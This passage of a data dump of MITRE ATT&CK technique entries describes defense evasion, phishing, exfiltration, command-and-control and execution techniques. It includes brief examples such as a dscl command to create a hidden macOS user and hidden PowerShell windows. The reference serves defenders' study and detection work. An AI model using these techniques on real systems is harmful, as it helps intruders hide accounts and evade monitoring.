                          'and prevent users from changing files or features on the system. Adversaries may abuse '
                          'these features to hide artifacts such as files, directories, user accounts, or other system '
                          'activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX '
                          'Pirrit)(Citation: MalwareBytes ADS July 2015)\n'
                          '\n'
                          'Adversaries may also attempt to hide artifacts associated with malicious behavior by '
                          'creating computing regions that are isolated from common security instrumentation, such as '
                          'through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)',
           'name': 'Hide Artifacts',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1564.001': {'attack_id': 'T1564.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may set files and directories to be hidden to evade detection mechanisms. '
                              'To prevent normal users from accidentally changing special files on a system, most '
                              'operating systems have the concept of a ‘hidden’ file. These files don’t show up when a '
                              'user browses the file system with a GUI or when using normal commands on the command '
                              'line. Users must explicitly ask to show the hidden files either via a series of '
                              'Graphical User Interface (GUI) prompts or with command line switches (<code>dir '
                              '/a</code> for Windows and <code>ls –a</code> for Linux and macOS).\n'
                              '\n'
                              'On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as '
                              'the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) '
                              '(Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, '
                              'are by default hidden from being viewed in the Finder application and standard '
                              'command-line utilities like “ls”. Users must specifically change settings to have these '
                              'files viewable.\n'
                              '\n'
                              'Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from '
                              'being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: '
                              'WireLurker). On Windows, users can mark specific files as hidden by using the '
                              'attrib.exe binary. Many applications create these hidden files and folders to store '
                              'information so that it doesn’t clutter up the user’s workspace. For example, SSH '
                              'utilities create a .ssh folder that’s hidden and contains the user’s known hosts and '
                              'keys.\n'
                              '\n'
                              'Adversaries can use this to their advantage to hide files and folders anywhere on the '
                              'system and evading a typical user or system analysis that does not incorporate '
                              'investigation of hidden files.',
               'name': 'Hidden Files and Directories',
               'platforms': ['Windows', 'macOS', 'Linux']},
 'T1564.002': {'attack_id': 'T1564.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use hidden users to mask the presence of user accounts they create. '
                              'Every user account in macOS has a userID associated with it. When creating a user, you '
                              'can specify the userID for that account.\n'
                              '\n'
                              'There is a property value in <code>/Library/Preferences/com.apple.loginwindow</code> '
                              'called <code>Hide500Users</code> that prevents users with userIDs 500 and lower from '
                              'appearing at the login screen. When using the [Create '
                              'Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 '
                              '(ex: <code>sudo dscl . -create /Users/username UniqueID 401</code>) and enabling this '
                              'property (setting it to Yes), an adversary can conceal user accounts. (Citation: '
                              'Cybereason OSX Pirrit).',
               'name': 'Hidden Users',
               'platforms': ['macOS']},
 'T1564.003': {'attack_id': 'T1564.003',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use hidden windows to conceal malicious activity from the plain sight '
                              'of users. In some cases, windows that would typically be displayed when an application '
                              'carries out an operation can be hidden. This may be utilized by system administrators '
                              'to avoid disrupting user work environments when carrying out administrative tasks. \n'
                              '\n'
                              'On Windows, there are a variety of features in scripting languages in Windows, such as '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual '
                              'Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One '
                              'example of this is <code>powershell.exe -WindowStyle Hidden</code>. (Citation: '
                              'PowerShell About 2019)\n'
                              '\n'
                              'Similarly, on macOS the configurations for how applications run are listed in property '
                              'list (plist) files. One of the tags in these files can be '
                              '<code>apple.awt.UIElement</code>, which allows for Java applications to prevent the '
                              "application's icon from appearing in the Dock. A common use for this is when "
                              "applications run in the system tray, but don't also want to show up in the Dock.\n"
                              '\n'
                              'Adversaries may abuse these functionalities to hide otherwise visible windows from '
                              'users so as not to alert the user to adversary activity on the system.(Citation: '
                              'Antiquated Mac Malware)',
               'name': 'Hidden Window',
               'platforms': ['macOS', 'Windows']},
 'T1564.004': {'attack_id': 'T1564.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use NTFS file attributes to hide their malicious data in order to evade '
                              'detection. Every New Technology File System (NTFS) formatted partition contains a '
                              'Master File Table (MFT) that maintains a record for every file/directory on the '
                              'partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file '
                              'attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended '
                              'Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one '
                              'Data attribute is present], that can be used to store arbitrary data (and even complete '
                              'files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) '
                              '(Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)\n'
                              '\n'
                              'Adversaries may store malicious data or binaries in file attribute metadata instead of '
                              'directly in files. This may be done to evade some defenses, such as static indicator '
                              'scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) '
                              '(Citation: MalwareBytes ADS July 2015)',
               'name': 'NTFS File Attributes',
               'platforms': ['Windows']},
 'T1564.005': {'attack_id': 'T1564.005',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use a hidden file system to conceal malicious activity from users and '
                              'security tools. File systems provide a structure to store and access data from physical '
                              'storage. Typically, a user engages with a file system through applications that allow '
                              'them to access files and directories, which are an abstraction from their physical '
                              'location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. '
                              'File systems can also contain other structures, such as the Volume Boot Record (VBR) '
                              'and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n'
                              '\n'
                              'Adversaries may use their own abstracted file system, separate from the standard file '
                              'system present on the infected system. In doing so, adversaries can hide the presence '
                              'of malicious components and file input/output from security tools. Hidden file systems, '
                              'sometimes referred to as virtual file systems, can be implemented in numerous ways. One '
                              'implementation would be to store a file system in reserved disk space unused by disk '
                              'structures or standard file system partitions.(Citation: MalwareTech VFS Nov '
                              '2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to '
                              'drop their own portable partition image as a file on top of the standard file '
                              'system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the '
                              'existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)',
               'name': 'Hidden File System',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1564.006': {'attack_id': 'T1564.006',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may carry out malicious operations using a virtual instance to avoid '
                              'detection. A wide variety of virtualization technologies exist that allow for the '
                              'emulation of a computer or computing environment. By running malicious code inside of a '
                              'virtual instance, adversaries can hide artifacts associated with their behavior from '
                              'security tools that are unable to monitor activity inside the virtual instance. '
                              'Additionally, depending on the virtual networking implementation (ex: bridged adapter), '
                              'network traffic generated by the virtual instance can be difficult to trace back to the '
                              'compromised host as the IP address and hostname might not match known values.(Citation: '
                              'SingHealth Breach Jan 2019)\n'
                              '\n'
                              'Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the '
                              'necessary files to run a virtual instance (ex: VirtualBox binaries). After running a '
                              'virtual instance, adversaries may create a shared folder between the guest and host '
                              'with permissions that enable the virtual instance to interact with the host file '
                              'system.(Citation: Sophos Ragnar May 2020)',
               'name': 'Run Virtual Instance',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1564.007': {'attack_id': 'T1564.007',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded '
                              'within MS Office documents by replacing the VBA source code with benign data.(Citation: '
                              'FireEye VBA stomp Feb 2020)\n'
                              '\n'
                              'MS Office documents with embedded VBA content store source code inside of module '
                              'streams. Each module stream has a <code>PerformanceCache</code> that stores a separate '
                              'compiled version of the VBA source code known as p-code. The p-code is executed when '
                              'the MS Office version specified in the <code>_VBA_PROJECT</code> stream (which contains '
                              'the version-dependent description of the VBA project) matches the version of the host '
                              'MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT '
                              'Stream)\n'
                              '\n'
                              'An adversary may hide malicious VBA code by overwriting the VBA source code location '
                              'with zero’s, benign code, or random bytes while leaving the previously compiled '
                              'malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the '
                              'unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some '
                              'tools might even think that there are no macros present. If there is a version match '
                              'between the <code>_VBA_PROJECT</code> stream and host MS Office application, the p-code '
                              'will be executed, otherwise the benign VBA source code will be decompressed and '
                              'recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic '
                              'analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb '
                              '2020)(Citation: pcodedmp Bontchev)',
               'name': 'VBA Stomping',
               'platforms': ['Linux', 'Windows', 'macOS']},
 'T1565': {'attack_id': 'T1565',
           'categories': ['impact'],
           'description': 'Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes '
                          'or hide activity. By manipulating data, adversaries may attempt to affect a business '
                          'process, organizational understanding, or decision making.\n'
                          '\n'
                          'The type of modification and the impact it will have depends on the target application and '
                          'process as well as the goals and objectives of the adversary. For complex systems, an '
                          'adversary would likely need special expertise and possibly access to specialized software '
                          'related to the system that would typically be gained through a prolonged information '
                          'gathering campaign in order to have the desired impact.',
           'name': 'Data Manipulation',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1565.001': {'attack_id': 'T1565.001',
               'categories': ['impact'],
               'description': 'Adversaries may insert, delete, or manipulate data at rest in order to manipulate '
                              'external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ '
                              'Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a '
                              'business process, organizational understanding, and decision making.\n'
                              '\n'
                              'Stored data could include a variety of file formats, such as Office files, databases, '
                              'stored emails, and custom file formats. The type of modification and the impact it will '
                              'have depends on the type of data as well as the goals and objectives of the adversary. '
                              'For complex systems, an adversary would likely need special expertise and possibly '
                              'access to specialized software related to the system that would typically be gained '
                              'through a prolonged information gathering campaign in order to have the desired impact.',
               'name': 'Stored Data Manipulation',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1565.002': {'attack_id': 'T1565.002',
               'categories': ['impact'],
               'description': 'Adversaries may alter data en route to storage or other systems in order to manipulate '
                              'external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ '
                              'Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect '
                              'a business process, organizational understanding, and decision making.\n'
                              '\n'
                              'Manipulation may be possible over a network connection or between system processes '
                              'where there is an opportunity deploy a tool that will intercept and change information. '
                              'The type of modification and the impact it will have depends on the target transmission '
                              'mechanism as well as the goals and objectives of the adversary. For complex systems, an '
                              'adversary would likely need special expertise and possibly access to specialized '
                              'software related to the system that would typically be gained through a prolonged '
                              'information gathering campaign in order to have the desired impact.',
               'name': 'Transmitted Data Manipulation',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1565.003': {'attack_id': 'T1565.003',
               'categories': ['impact'],
               'description': 'Adversaries may modify systems in order to manipulate the data as it is accessed and '
                              'displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony '
                              '2018) By manipulating runtime data, adversaries may attempt to affect a business '
                              'process, organizational understanding, and decision making.\n'
                              '\n'
                              'Adversaries may alter application binaries used to display data in order to cause '
                              'runtime manipulations. Adversaries may also conduct [Change Default File '
                              'Association](https://attack.mitre.org/techniques/T1546/001) and '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. '
                              'The type of modification and the impact it will have depends on the target application '
                              'and process as well as the goals and objectives of the adversary. For complex systems, '
                              'an adversary would likely need special expertise and possibly access to specialized '
                              'software related to the system that would typically be gained through a prolonged '
                              'information gathering campaign in order to have the desired impact.',
               'name': 'Runtime Data Manipulation',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1566': {'attack_id': 'T1566',
           'categories': ['initial-access'],
           'description': 'Adversaries may send phishing messages to gain access to victim systems. All forms of '
                          'phishing are electronically delivered social engineering. Phishing can be targeted, known '
                          'as spearphishing. In spearphishing, a specific individual, company, or industry will be '
                          'targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, '
                          'such as in mass malware spam campaigns.\n'
                          '\n'
                          'Adversaries may send victims emails containing malicious attachments or links, typically to '
                          'execute malicious code on victim systems or to gather credentials for use of [Valid '
                          'Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via '
                          'third-party services, like social media platforms.',
           'name': 'Phishing',
           'platforms': ['Linux', 'macOS', 'Windows', 'SaaS', 'Office 365']},
 'T1566.001': {'attack_id': 'T1566.001',
               'categories': ['initial-access'],
               'description': 'Adversaries may send spearphishing emails with a malicious attachment in an attempt to '
                              'gain access to victim systems. Spearphishing attachment is a specific variant of '
                              'spearphishing. Spearphishing attachment is different from other forms of spearphishing '
                              'in that it employs the use of malware attached to an email. All forms of spearphishing '
                              'are electronically delivered social engineering targeted at a specific individual, '
                              'company, or industry. In this scenario, adversaries attach a file to the spearphishing '
                              'email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) '
                              'to gain execution.\n'
                              '\n'
                              'There are many options for the attachment such as Microsoft Office documents, '
                              'executables, PDFs, or archived files. Upon opening the attachment (and potentially '
                              "clicking past protections), the adversary's payload exploits a vulnerability or "
                              "directly executes on the user's system. The text of the spearphishing email usually "
                              'tries to give a plausible reason why the file should be opened, and may explain how to '
                              'bypass system protections in order to do so. The email may also contain instructions on '
                              'how to decrypt an attachment, such as a zip file password, in order to evade email '
                              'boundary defenses. Adversaries frequently manipulate file extensions and icons in order '
                              'to make attached executables appear to be document files, or files exploiting one '
                              'application appear to be a file for a different one.',
               'name': 'Spearphishing Attachment',
               'platforms': ['macOS', 'Windows', 'Linux']},
 'T1566.002': {'attack_id': 'T1566.002',
               'categories': ['initial-access'],
               'description': 'Adversaries may send spearphishing emails with a malicious link in an attempt to gain '
                              'access to victim systems. Spearphishing with a link is a specific variant of '
                              'spearphishing. It is different from other forms of spearphishing in that it employs the '
                              'use of links to download malware contained in email, instead of attaching malicious '
                              'files to the email itself, to avoid defenses that may inspect email attachments. \n'
                              '\n'
                              'All forms of spearphishing are electronically delivered social engineering targeted at '
                              'a specific individual, company, or industry. In this case, the malicious emails contain '
                              'links. Generally, the links will be accompanied by social engineering text and require '
                              'the user to actively click or copy and paste a URL into a browser, leveraging [User '
                              'Execution](https://attack.mitre.org/techniques/T1204). The visited website may '
                              'compromise the web browser using an exploit, or the user will be prompted to download '
                              'applications, documents, zip files, or even executables depending on the pretext for '
                              'the email in the first place. Adversaries may also include links that are intended to '
                              'interact directly with an email reader, including embedded images intended to exploit '
                              'the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). '
                              'Links may also direct users to malicious applications  designed to [Steal Application '
                              'Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order '
                              'to gain access to protected applications and information.(Citation: Trend Micro Pawn '
                              'Storm OAuth 2017)',
               'name': 'Spearphishing Link',
               'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'SaaS']},
 'T1566.003': {'attack_id': 'T1566.003',
               'categories': ['initial-access'],
               'description': 'Adversaries may send spearphishing messages via third-party services in an attempt to '
                              'gain access to victim systems. Spearphishing via service is a specific variant of '
                              'spearphishing. It is different from other forms of spearphishing in that it employs the '
                              'use of third party services rather than directly via enterprise email channels. \n'
                              '\n'
                              'All forms of spearphishing are electronically delivered social engineering targeted at '
                              'a specific individual, company, or industry. In this scenario, adversaries send '
                              'messages through various social media services, personal webmail, and other '
                              'non-enterprise controlled services. These services are more likely to have a '
                              'less-strict security policy than an enterprise. As with most kinds of spearphishing, '
                              "the goal is to generate rapport with the target or get the target's interest in some "
                              'way. Adversaries will create fake social media accounts and message employees for '
                              'potential job opportunities. Doing so allows a plausible reason for asking about '
                              "services, policies, and software that's running in an environment. The adversary can "
                              'then send malicious links or attachments through these services.\n'
                              '\n'
                              'A common example is to build rapport with a target via social media, then send content '
                              'to a personal webmail service that the target uses on their work computer. This allows '
                              'an adversary to bypass some email restrictions on the work account, and the target is '
                              "more likely to open the file since it's something they were expecting. If the payload "
                              "doesn't work as expected, the adversary can continue normal communications and "
                              'troubleshoot with the target on how to get it working.',
               'name': 'Spearphishing via Service',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1567': {'attack_id': 'T1567',
           'categories': ['exfiltration'],
           'description': 'Adversaries may use an existing, legitimate external Web service to exfiltrate data rather '
                          'than their primary command and control channel. Popular Web services acting as an '
                          'exfiltration mechanism may give a significant amount of cover due to the likelihood that '
                          'hosts within a network are already communicating with them prior to compromise. Firewall '
                          'rules may also already exist to permit traffic to these services.\n'
                          '\n'
                          'Web service providers also commonly use SSL/TLS encryption, giving adversaries an added '
                          'level of protection.',
           'name': 'Exfiltration Over Web Service',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1567.001': {'attack_id': 'T1567.001',
               'categories': ['exfiltration'],
               'description': 'Adversaries may exfiltrate data to a code repository rather than over their primary '
                              'command and control channel. Code repositories are often accessible via an API (ex: '
                              'https://api.github.com). Access to these APIs are often over HTTPS, which gives the '
                              'adversary an additional level of protection.\n'
                              '\n'
                              'Exfiltration to a code repository can also provide a significant amount of cover to the '
                              'adversary if it is a popular service already used by hosts within the network. ',
               'name': 'Exfiltration to Code Repository',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1567.002': {'attack_id': 'T1567.002',
               'categories': ['exfiltration'],
               'description': 'Adversaries may exfiltrate data to a cloud storage service rather than over their '
                              'primary command and control channel. Cloud storage services allow for the storage, '
                              'edit, and retrieval of data from a remote cloud storage server over the Internet.\n'
                              '\n'
                              'Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to '
                              'these cloud storage services can provide a significant amount of cover to the adversary '
                              'if hosts within the network are already communicating with the service. ',
               'name': 'Exfiltration to Cloud Storage',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1568': {'attack_id': 'T1568',
           'categories': ['command-and-control'],
           'description': 'Adversaries may dynamically establish connections to command and control infrastructure to '
                          'evade common detections and remediations. This may be achieved by using malware that shares '
                          "a common algorithm with the infrastructure the adversary uses to receive the malware's "
                          'communications. These calculations can be used to dynamically adjust parameters such as the '
                          'domain name, IP address, or port number the malware uses for command and control.\n'
                          '\n'
                          'Adversaries may use dynamic resolution for the purpose of [Fallback '
                          'Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary '
                          'command and control server malware may employ dynamic resolution as a means to '
                          'reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye '
                          'POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)',
           'name': 'Dynamic Resolution',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1568.001': {'attack_id': 'T1568.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use Fast Flux DNS to hide a command and control channel behind an array '
                              'of rapidly changing IP addresses linked to a single domain resolution. This technique '
                              'uses a fully qualified domain name, with multiple IP addresses assigned to it which are '
                              'swapped with high frequency, using a combination of round robin IP addressing and short '
                              'Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: '
                              'MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)\n'
                              '\n'
                              'The simplest, "single-flux" method, involves registering and de-registering an '
                              'addresses as part of the DNS A (address) record list for a single DNS name. These '
                              'registrations have a five-minute average lifespan, resulting in a constant shuffle of '
                              'IP address resolution.(Citation: Fast Flux - Welivesecurity)\n'
                              '\n'
                              'In contrast, the "double-flux" method registers and de-registers an address as part of '
                              'the DNS Name Server record list for the DNS zone, providing additional resilience for '
                              'the connection. With double-flux additional hosts can act as a proxy to the C2 host, '
                              'further insulating the true source of the C2 channel.',
               'name': 'Fast Flux DNS',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1568.002': {'attack_id': 'T1568.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify '
                              'a destination domain for command and control traffic rather than relying on a list of '
                              'static IP addresses or domains. This has the advantage of making it much harder for '
                              'defenders block, track, or take over the command and control channel, as there '
                              'potentially could be thousands of domains that malware can check for '
                              'instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella '
                              'DGA)(Citation: Unit 42 DGA Feb 2019)\n'
                              '\n'
                              'DGAs can take the form of apparently random or “gibberish” strings (ex: '
                              'istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. '
                              'Alternatively, some DGAs employ whole words as the unit by concatenating words together '
                              'instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a '
                              'different domain for each time period (hourly, daily, monthly, etc). Others incorporate '
                              'a seed value as well to make predicting future domains more difficult for '
                              'defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella '
                              'DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n'
                              '\n'
                              'Adversaries may use DGAs for the purpose of [Fallback '
                              'Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the '
                              'primary command and control server malware may employ a DGA as a means to '
                              'reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye '
                              'POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)',
               'name': 'Domain Generation Algorithms',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1568.003': {'attack_id': 'T1568.003',
               'categories': ['command-and-control'],
               'description': 'Adversaries may perform calculations on addresses returned in DNS results to determine '
                              'which port and IP address to use for command and control, rather than relying on a '
                              'predetermined port number or the actual returned IP address. A IP and/or port number '
                              'calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers '
                              'Numbered Panda)\n'
                              '\n'
                              'One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) '
                              'is to take the first three octets of an IP address in a DNS response and use those '
                              'values to calculate the port for command and control traffic.(Citation: Meyers Numbered '
                              'Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)',
               'name': 'DNS Calculation',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1569': {'attack_id': 'T1569',
           'categories': ['execution'],
           'description': 'Adversaries may abuse system services or daemons to execute commands or programs. '
                          'Adversaries can execute malicious content by interacting with or creating services. Many '
                          'services are set to run at boot, which can aid in achieving persistence ([Create or Modify '
                          'System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse '
                          'services for one-time or temporary execution.',
           'name': 'System Services',
           'platforms': ['Windows', 'macOS']},
 'T1569.001': {'attack_id': 'T1569.001',
               'categories': ['execution'],
               'description': 'Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the '
                              'macOS launchd process, which handles things like [Launch '
                              'Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands '
                              'or programs itself. Launchctl supports taking subcommands on the command-line, '
                              'interactively, or even redirected from standard input.(Citation: Launchctl Man)\n'
                              '\n'
                              'By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s '
                              'or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can '
                              'install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)\n'
                              '\n'
                              'Running a command from launchctl is as simple as <code>launchctl submit -l <labelName> '
                              '-- /Path/to/thing/to/execute "arg" "arg" "arg"</code>. Adversaries can abuse this '
                              'functionality to execute code or even bypass application control if launchctl is an '
                              'allowed process.',
               'name': 'Launchctl',
               'platforms': ['macOS']},
 'T1569.002': {'attack_id': 'T1569.002',
               'categories': ['execution'],
               'description': 'Adversaries may abuse the Windows service control manager to execute malicious commands '
                              'or payloads. The Windows service control manager (<code>services.exe</code>) is an '
                              'interface to manage and manipulate services.(Citation: Microsoft Service Control '
                              'Manager) The service control manager is accessible to users via GUI components as well '
                              'as system utilities such as <code>sc.exe</code> and '
                              '[Net](https://attack.mitre.org/software/S0039).\n'
                              '\n'
                              '[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands '
                              'or payloads via a temporary Windows service created through the service control manager '
                              'API.(Citation: Russinovich Sysinternals)\n'
                              '\n'
                              'Adversaries may leverage these mechanisms to execute malicious content. This can be '
                              'done by either executing a new or modified service. This technique is the execution '
                              'used in conjunction with [Windows '
                              'Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or '
                              'privilege escalation.',
               'name': 'Service Execution',
               'platforms': ['Windows']},
 'T1570': {'attack_id': 'T1570',
           'categories': ['lateral-movement'],
           'description': 'Adversaries may transfer tools or other files between systems in a compromised environment. '
                          'Files may be copied from one system to another to stage adversary tools or other files over '
                          'the course of an operation. Adversaries may copy files laterally between internal victim '
                          'systems to support lateral movement using inherent file sharing protocols such as file '
                          'sharing over SMB to connected network shares or with authenticated connections with '
                          '[SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote '
                          'Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied '
                          'over on Mac and Linux with native tools like scp, rsync, and sftp.',
           'name': 'Lateral Tool Transfer',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1571': {'attack_id': 'T1571',
           'categories': ['command-and-control'],
           'description': 'Adversaries may communicate using a protocol and port paring that are typically not '
                          'associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port '
                          '587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. '
                          'Adversaries may make changes to the standard port used by a protocol to bypass filtering or '
                          'muddle analysis/parsing of network data.',
           'name': 'Non-Standard Port',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1572': {'attack_id': 'T1572',
           'categories': ['command-and-control'],
           'description': 'Adversaries may tunnel network communications to and from a victim system within a separate '
                          'protocol to avoid detection/network filtering and/or enable access to otherwise unreachable '
                          'systems. Tunneling involves explicitly encapsulating a protocol within another. This '
                          'behavior may conceal malicious traffic by blending in with existing traffic and/or provide '
                          'an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of '
                          'network packets that would otherwise not reach their intended destination, such as SMB, '
                          'RDP, or other traffic that would be filtered by network appliances or not routed over the '
                          'Internet. \n'
                          '\n'
                          'There are various means to encapsulate a protocol within another protocol. For example, '
                          'adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves '
                          'forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) \n'
                          '\n'
                          '[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by '
                          'adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known '
                          'as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within '
                          'encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) \n'
                          '\n'
                          'Adversaries may also leverage [Protocol '
                          'Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with '
                          '[Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol '
                          'Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 '
                          'communications and infrastructure. ',
           'name': 'Protocol Tunneling',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1573': {'attack_id': 'T1573',
           'categories': ['command-and-control'],
           'description': 'Adversaries may employ a known encryption algorithm to conceal command and control traffic '
                          'rather than relying on any inherent protections provided by a communication protocol. '
                          'Despite the use of a secure algorithm, these implementations may be vulnerable to reverse '
                          'engineering if secret keys are encoded and/or generated within malware '
                          'samples/configuration files.',
           'name': 'Encrypted Channel',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1573.001': {'attack_id': 'T1573.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may employ a known symmetric encryption algorithm to conceal command and '
                              'control traffic rather than relying on any inherent protections provided by a '
                              'communication protocol. Symmetric encryption algorithms use the same key for plaintext '
                              'encryption and ciphertext decryption. Common symmetric encryption algorithms include '
                              'AES, DES, 3DES, Blowfish, and RC4.',
               'name': 'Symmetric Cryptography',
               'platforms': ['Linux', 'Windows', 'macOS']},
 'T1573.002': {'attack_id': 'T1573.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may employ a known asymmetric encryption algorithm to conceal command and '
                              'control traffic rather than relying on any inherent protections provided by a '
                              'communication protocol. Asymmetric cryptography, also known as public key cryptography, '
                              'uses a keypair per party: one public that can be freely distributed, and one private. '
                              'Due to how the keys are generated, the sender encrypts data with the receiver’s public '
                              'key and the receiver decrypts the data with their private key. This ensures that only '
                              'the intended recipient can read the encrypted data. Common public key encryption '
                              'algorithms include RSA and ElGamal.\n'
                              '\n'
                              'For efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a '
                              'connection is established, but use asymmetric cryptography to establish or transmit a '
                              'key. As such, these protocols are classified as [Asymmetric '
                              'Cryptography](https://attack.mitre.org/techniques/T1573/002).',
               'name': 'Asymmetric Cryptography',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1574': {'attack_id': 'T1574',
           'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
           'description': 'Adversaries may execute their own malicious payloads by hijacking the way operating systems '
                          'run programs. Hijacking execution flow can be for the purposes of persistence, since this '
                          'hijacked execution may reoccur over time. Adversaries may also use these mechanisms to '
                          'elevate privileges or evade defenses, such as application control or other restrictions on '
                          'execution.\n'
                          '\n'
                          'There are many ways an adversary may hijack the flow of execution, including by '
                          'manipulating how the operating system locates programs to be executed. How the operating '
                          'system locates libraries to be used by a program can also be intercepted. Locations where '
                          'the operating system looks for programs/resources, such as file directories and in the case '
                          'of Windows the Registry, could also be poisoned to include malicious payloads.',
           'name': 'Hijack Execution Flow',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1574.001': {'attack_id': 'T1574.001',
               'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
